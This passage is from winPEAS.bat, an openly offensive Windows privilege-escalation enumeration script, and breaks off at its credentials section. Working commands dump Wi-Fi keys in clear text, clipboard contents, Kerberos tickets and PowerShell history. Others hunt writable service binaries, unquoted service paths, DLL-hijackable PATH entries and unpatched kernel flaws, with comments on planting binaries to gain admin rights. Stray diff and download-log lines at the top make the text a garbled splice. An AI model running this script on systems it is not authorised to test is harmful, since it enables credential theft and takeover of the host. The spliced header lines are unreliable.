 REM :: Code by carlospolop; Re-Write by ThisLimn0
-2021-05-03 18:13:46 (13,2 MB/s) - »winPEAS.bat.1« gespeichert [35107/35107]
+REM Registry scan of other drives besides 
 REM /////true or false
 SET long=false
 :Splash
 ECHO.
 CALL :ColorLine "            %E%32m((,.,/((((((((((((((((((((/,  */%E%97m"
 CALL :ColorLine "     %E%32m,/*,..*(((((((((((((((((((((((((((((((((,%E%97m"              
 CALL :ColorLine "   %E%32m,*/((((((((((((((((((/,  %E%92m.*//((//**,%E%32m .*((((((*%E%97m"       
 CALL :ColorLine "   %E%32m((((((((((((((((* %E%94m*****%E%32m,,,/########## %E%32m.(* ,((((((%E%97m"   
 CALL :ColorLine "   %E%32m(((((((((((/* %E%94m******************%E%32m/####### %E%32m.(. ((((((%E%97m"
 CALL :ColorLine "   %E%32m((((((.%E%92m.%E%94m******************%E%97m/@@@@@/%E%94m***%E%92m/######%E%32m /((((((%E%97m"
 CALL :ColorLine "   %E%32m,,.%E%92m.%E%94m**********************%E%97m@@@@@@@@@@(%E%94m***%E%92m,####%E%32m ../(((((%E%97m"
 CALL :ColorLine "   %E%32m, ,%E%92m%E%94m**********************%E%97m#@@@@@#@@@@%E%94m*********%E%92m##%E%32m((/ /((((%E%97m"
 CALL :ColorLine "   %E%32m..((%E%92m(##########%E%94m*********%E%97m/#@@@@@@@@@/%E%94m*************%E%32m,,..((((%E%97m"
 CALL :ColorLine "   %E%32m.((%E%92m(################(/%E%94m******%E%97m/@@@@@#%E%94m****************%E%32m.. /((%E%97m"
 CALL :ColorLine "   %E%32m.(%E%92m(########################(/%E%94m************************%E%32m..*(%E%97m"
 CALL :ColorLine "   %E%32m.(%E%92m(#############################(/%E%94m********************%E%32m.,(%E%97m"
 CALL :ColorLine "   %E%32m.(%E%92m(##################################(/%E%94m***************%E%32m..(%E%97m"
 CALL :ColorLine "   %E%32m.(%E%92m(######################################(%E%94m************%E%32m..(%E%97m"
 CALL :ColorLine "   %E%32m.(%E%92m(######(,.***.,(###################(..***(/%E%94m*********%E%32m..(%E%97m"
 CALL :ColorLine "   %E%32m.(%E%92m(######*(#####((##################((######/(%E%94m********%E%32m..(%E%97m"
 CALL :ColorLine "   %E%32m.(%E%92m(##################(/**********(################(%E%94m**%E%32m...(%E%97m"
 CALL :ColorLine "   %E%32m.((%E%92m(####################/*******(###################%E%32m.((((%E%97m" 
 CALL :ColorLine "   %E%32m.((((%E%92m(############################################/%E%32m  /((%E%97m"
 CALL :ColorLine "   %E%32m..((((%E%92m(#########################################(%E%32m..(((((.%E%97m"
 CALL :ColorLine "   %E%32m....((((%E%92m(#####################################(%E%32m .((((((.%E%97m"
 CALL :ColorLine "   %E%32m......((((%E%92m(#################################(%E%32m .(((((((.%E%97m"
 CALL :ColorLine "   %E%32m(((((((((. ,%E%92m(############################(%E%32m../(((((((((.%E%97m"
 CALL :ColorLine "       %E%32m(((((((((/,  %E%92m,####################(%E%32m/..((((((((((.%E%97m"
 CALL :ColorLine "             %E%32m(((((((((/,.  %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m"
 CALL :ColorLine "                %E%32m(((((((((((((((((((((((((((/%E%97m"
 ECHO.                       by carlospolop
 ECHO.
 ECHO.
 :Advisory
 REM // Increase progress in title by n percent
 CALL :T_Progress 0
 ECHO./^^!\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script
 CALL :ColorLine "   %E%41mWinPEAS should be used for authorized penetration testing and/or educational purposes only.%E%40;97m"
 CALL :ColorLine "   %E%41mAny misuse of this software will not be the responsibility of the author or of any other collaborator.%E%40;97m"
 CALL :ColorLine "   %E%41mUse it at your own networks and/or with the network owner's permission.%E%40;97m"
 ECHO.
 :SystemInfo
 CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO
 CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
 ECHO.   [i] Check for vulnerabilities for the OS version with the applied patches
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits
 systeminfo
 ECHO.
 CALL :T_Progress 2
 :ListHotFixes
 wmic qfe get Caption,Description,HotFixID,InstalledOn | more
 set expl=no
 for /f "tokens=3-9" %%a in ('systeminfo') do (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i "2000 XP 2003 2008 vista" && set expl=yes) & (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i /C:"windows 7" && set expl=yes)
 IF "%expl%" == "yes" ECHO.   [i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2592799" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-080 patch is NOT installed! (Vulns: XP/SP3,2K3/SP3-afd.sys)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3143141" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-032 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-011 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB982799" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-59 patch is NOT installed! (Vulns: 2K8,Vista,7/SP0-Chimichurri)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979683" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-21 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2305420" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-092 patch is NOT installed! (Vulns: 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB981957" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-073 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4013081" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS17-017 patch is NOT installed! (Vulns: 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB977165" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-015 patch is NOT installed! (Vulns: 2K,XP,2K3,2K8,Vista,7-User Mode to Ring)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB941693" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS08-025 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB920958" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-049 patch is NOT installed! (Vulns: 2K/SP4-ZwQuerySysInfo)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB914389" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-030 patch is NOT installed! (Vulns: 2K,XP/SP2-Mrxsmb.sys)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB908523" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-055 patch is NOT installed! (Vulns: 2K/SP4-APC Data-Free)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB890859" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-018 patch is NOT installed! (Vulns: 2K/SP3/4,XP/SP1/2-CSRSS)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB842526" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-019 patch is NOT installed! (Vulns: 2K/SP2/3/4-Utility Manager)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB835732" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-011 patch is NOT installed! (Vulns: 2K/SP2/3/4,XP/SP0/1-LSASS service BoF)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB841872" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-020 patch is NOT installed! (Vulns: 2K/SP4-POSIX)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2975684" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-040 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-016 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3057191" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS15-051 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2989935" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-070 patch is NOT installed! (Vulns: 2K3/SP2-TCP/IP)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2778930" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-005 patch is NOT installed! (Vulns: Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2850851" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-053 patch is NOT installed! (Vulns: 7SP0/SP1_x86-schlamperei)
 IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2870008" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-081 patch is NOT installed! (Vulns: 7SP0/SP1_x86-track_popup_menu)
 ECHO.
 CALL :T_Progress 2
 :DateAndTime
 CALL :ColorLine " %E%33m[+]%E%97m DATE and TIME"
 ECHO.   [i] You may need to adjust your local date/time to exploit some vulnerability
 date /T
 time /T
 ECHO.
 CALL :T_Progress 2
 :AuditSettings
 CALL :ColorLine " %E%33m[+]%E%97m Audit Settings"
 ECHO.   [i] Check what is being logged
 REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit 2>nul
 ECHO.
 CALL :T_Progress 1
 :WEFSettings
 CALL :ColorLine " %E%33m[+]%E%97m WEF Settings"
 ECHO.   [i] Check where are being sent the logs
 REG QUERY HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager 2>nul
 ECHO.
 CALL :T_Progress 1
 :LAPSInstallCheck
 CALL :ColorLine " %E%33m[+]%E%97m LAPS installed?"
 ECHO.   [i] Check what is being logged
 REG QUERY "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled 2>nul
 ECHO.
 CALL :T_Progress 1
 :LSAProtectionCheck
 CALL :ColorLine " %E%33m[+]%E%97m LSA protection?"
 ECHO.   [i] Active if "1"
 REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v RunAsPPL 2>nul
 CALL :T_Progress 1
 :LSACredentialGuard
 CALL :ColorLine " %E%33m[+]%E%97m Credential Guard?"
 ECHO.   [i] Active if "1" or "2"
 REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v LsaCfgFlags 2>nul
 ECHO.
 CALL :T_Progress 1
 :LogonCredentialsPlainInMemory
 CALL :ColorLine " %E%33m[+]%E%97m WDigest?"
 ECHO.   [i] Plain-text creds in memory if "1"
 reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential 2>nul
 ECHO.
 CALL :T_Progress 1
 :CachedCreds
 CALL :ColorLine " %E%33m[+]%E%97m Number of cached creds"
 ECHO.   [i] You need System-rights to extract them
 reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CACHEDLOGONSCOUNT 2>nul
 CALL :T_Progress 1
 :UACSettings
 CALL :ColorLine " %E%33m[+]%E%97m UAC Settings"
 ECHO.   [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
 REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul
 ECHO.
 CALL :T_Progress 1
 :AVSettings
 CALL :ColorLine " %E%33m[+]%E%97m Registered Anti-Virus(AV)"
 WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more 
 ECHO.Checking for defender whitelisted PATHS
 reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" 2>nul
 CALL :T_Progress 1
 :PSSettings
 CALL :ColorLine " %E%33m[+]%E%97m PowerShell settings"
 ECHO.PowerShell v2 Version:
 REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine /v PowerShellVersion 2>nul
 ECHO.PowerShell v5 Version:
 REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine /v PowerShellVersion 2>nul
 ECHO.Transcriptions Settings:
 REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription 2>nul
 ECHO.Module logging settings:
 REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging 2>nul
 ECHO.Scriptblog logging settings:
 REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging 2>nul
 ECHO.
 ECHO.PS default transcript history
 dir %SystemDrive%\transcripts\ 2>nul
 ECHO.
 ECHO.Checking PS history file
 dir "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" 2>nul
 ECHO.
 CALL :T_Progress 3
 :MountedDisks
 CALL :ColorLine " %E%33m[+]%E%97m MOUNTED DISKS"
 ECHO.   [i] Maybe you find something interesting
 (wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
 ECHO.
 CALL :T_Progress 1
 :Environment
 CALL :ColorLine " %E%33m[+]%E%97m ENVIRONMENT"
 ECHO.   [i] Interesting information?
 ECHO.
 set
 ECHO.
 CALL :T_Progress 1
 :InstalledSoftware
 CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE"
 ECHO.   [i] Some weird software? Check for vulnerabilities in unknow software installed
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
 ECHO.
 dir /b "C:\Program Files" "C:\Program Files (x86)" | sort
 reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\"
 reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ /s | findstr InstallLocation | findstr ":\\"
 IF exist C:\Windows\CCM\SCClient.exe ECHO.SCCM is installed (installers are run with SYSTEM privileges, many are vulnerable to DLL Sideloading)
 ECHO.
 CALL :T_Progress 2
 :RemodeDeskCredMgr
 CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager"
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager
 IF exist "%AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
 ECHO.
 CALL :T_Progress 1
 :WSUS
 CALL :ColorLine " %E%33m[+]%E%97m WSUS"
 ECHO.   [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus
 reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://"
 ECHO.
 CALL :T_Progress 1
 :RunningProcesses
 CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES"
 ECHO.   [i] Something unexpected is running? Check for vulnerabilities
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes
 tasklist /SVC
 ECHO.
 CALL :T_Progress 2
 ECHO.   [i] Checking file permissions of running processes (File backdooring - maybe the same files start automatically when Administrator logs in)
 for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
 	for /f eol^=^"^ delims^=^" %%z in ('ECHO.%%x') do (
 		icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO.
 	)
 )
 ECHO.
 ECHO.   [i] Checking directory permissions of running processes (DLL injection)
 for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('ECHO.%%x') do (
 	icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO.
 )
 ECHO.
 CALL :T_Progress 3
 :RunAtStartup
 CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP"
 ECHO.   [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup
 ::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^
 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^
 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^
 reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^
 reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^
 CALL :T_Progress 2
 icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
 icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
 icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
 icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
 CALL :T_Progress 2
 icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
 icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
 icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
 icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
 CALL :T_Progress 2
 schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab informa")
 ECHO.
 CALL :T_Progress 2
 :AlwaysInstallElevated
 CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?"
 ECHO.   [i] If '1' then you can install a .msi file with admin privileges ;)
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
 ECHO.
 CALL :T_Progress 2
 :NetworkShares
 CALL :ColorLine "%E%32m[*]%E%97m NETWORK"
 CALL :ColorLine " %E%33m[+]%E%97m CURRENT SHARES"
 net share
 ECHO.
 CALL :T_Progress 1
 :NetworkInterfaces
 CALL :ColorLine " %E%33m[+]%E%97m INTERFACES"
 ipconfig  /all
 ECHO.
 CALL :T_Progress 1
 :NetworkUsedPorts
 CALL :ColorLine " %E%33m[+]%E%97m USED PORTS"
 ECHO.   [i] Check for services restricted from the outside
 netstat -ano | findstr /i listen
 ECHO.
 CALL :T_Progress 1
 :NetworkFirewall
 CALL :ColorLine " %E%33m[+]%E%97m FIREWALL"
 netsh firewall show state
 netsh firewall show config
 ECHO.
 CALL :T_Progress 2
 :ARP
 CALL :ColorLine " %E%33m[+]%E%97m ARP"
 arp -A
 ECHO.
 CALL :T_Progress 1
 :NetworkRoutes
 CALL :ColorLine " %E%33m[+]%E%97m ROUTES"
 route print
 ECHO.
 CALL :T_Progress 1
 :WindowsHostsFile
 CALL :ColorLine " %E%33m[+]%E%97m Hosts file"
 type C:\WINDOWS\System32\drivers\etc\hosts | findstr /v "^#"
 CALL :T_Progress 1
 :DNSCache
 CALL :ColorLine " %E%33m[+]%E%97m DNS CACHE"
 ipconfig /displaydns | findstr "Record" | findstr "Name Host"
 ECHO.
 CALL :T_Progress 1
 :WifiCreds
 CALL :ColorLine " %E%33m[+]%E%97m WIFI"
 for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.)
 CALL :T_Progress 1
 :BasicUserInfo
 CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO
 ECHO.   [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups
 ECHO.
 CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER"
 net user %username%
 net user %USERNAME% /domain 2>nul
 whoami /all
 ECHO.
 CALL :T_Progress 2
 :BasicUserInfoUsers
 CALL :ColorLine " %E%33m[+]%E%97m USERS"
 net user
 ECHO.
 CALL :T_Progress 1
 :BasicUserInfoGroups
 CALL :ColorLine " %E%33m[+]%E%97m GROUPS"
 net localgroup
 ECHO.
 CALL :T_Progress 1
 :BasicUserInfoAdminGroups
 CALL :ColorLine " %E%33m[+]%E%97m ADMINISTRATORS GROUPS"
 REM seems to be localised
 net localgroup Administrators 2>nul
 net localgroup Administradores 2>nul
 ECHO. 
 CALL :T_Progress 1
 :BasicUserInfoLoggedUser
 CALL :ColorLine " %E%33m[+]%E%97m CURRENT LOGGED USERS"
 quser
 ECHO. 
 CALL :T_Progress 1
 :KerberosTickets
 CALL :ColorLine " %E%33m[+]%E%97m Kerberos Tickets"
 klist
 ECHO. 
 CALL :T_Progress 1
 :CurrentClipboard
 CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD"
 ECHO.   [i] Any password inside the clipboard?
 powershell -command "Get-Clipboard" 2>nul
 ECHO.
 CALL :T_Progress 1
 :ServiceVulnerabilities
 CALL :ColorLine "%E%32m[*]%E%97m SERVICE VULNERABILITIES"
 :::sysinternals external tool
 ::ECHO.
 ::CALL :ColorLine " %E%33m[+]%E%97m SERVICE PERMISSIONS WITH accesschk.exe FOR 'Authenticated users', Everyone, BUILTIN\Users, Todos and CURRENT USER"
 ::ECHO.   [i] If Authenticated Users have SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG or WRITE_DAC or WRITE_OWNER or GENERIC_WRITE or GENERIC_ALL, you can modify the binary that is going to be executed by the service and start/stop the service
 ::ECHO.   [i] If accesschk.exe is not in PATH, nothing will be found here
 ::ECHO.   [i] AUTHETICATED USERS
 ::accesschk.exe -uwcqv "Authenticated Users" * /accepteula 2>nul
 ::ECHO.   [i] EVERYONE
 ::accesschk.exe -uwcqv "Everyone" * /accepteula 2>nul
 ::ECHO.   [i] BUILTIN\Users
 ::accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
 ::ECHO.   [i] TODOS
 ::accesschk.exe -uwcqv "Todos" * /accepteula 2>nul
 ::ECHO.   [i] %USERNAME%
 ::accesschk.exe -uwcqv %username% * /accepteula 2>nul
 ::ECHO.
 ::CALL :ColorLine " %E%33m[+]%E%97m SERVICE PERMISSIONS WITH accesschk.exe FOR *"
 ::ECHO.   [i] Check for weird service permissions for unexpected groups"
 ::accesschk.exe -uwcqv * /accepteula 2>nul
 CALL :T_Progress 1
 ECHO.
 :ServiceBinaryPermissions
 CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS"
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
 for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do (
    for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO.
 )
 ECHO.
 CALL :T_Progress 1
 :CheckRegistryModificationAbilities
 CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY"
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
 for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a
 ECHO.
 CALL :T_Progress 1
 :UnquotedServicePaths
 CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS"
 ECHO.   [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
 ECHO.   [i] The permissions are also checked and filtered using icacls
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
 for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
 	for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
 		ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO.
 	)
 )
 CALL :T_Progress 2
 ::wmic service get name,displayname,pathname,startmode | more | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v """
 ECHO.
 ::CALL :T_Progress 1
 :PATHenvHijacking
 CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable"
 ECHO.   [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
 ECHO.   [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking
 for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. )
 ECHO.
 CALL :T_Progress 1
 :WindowsCredentials
 CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS"
 ECHO.
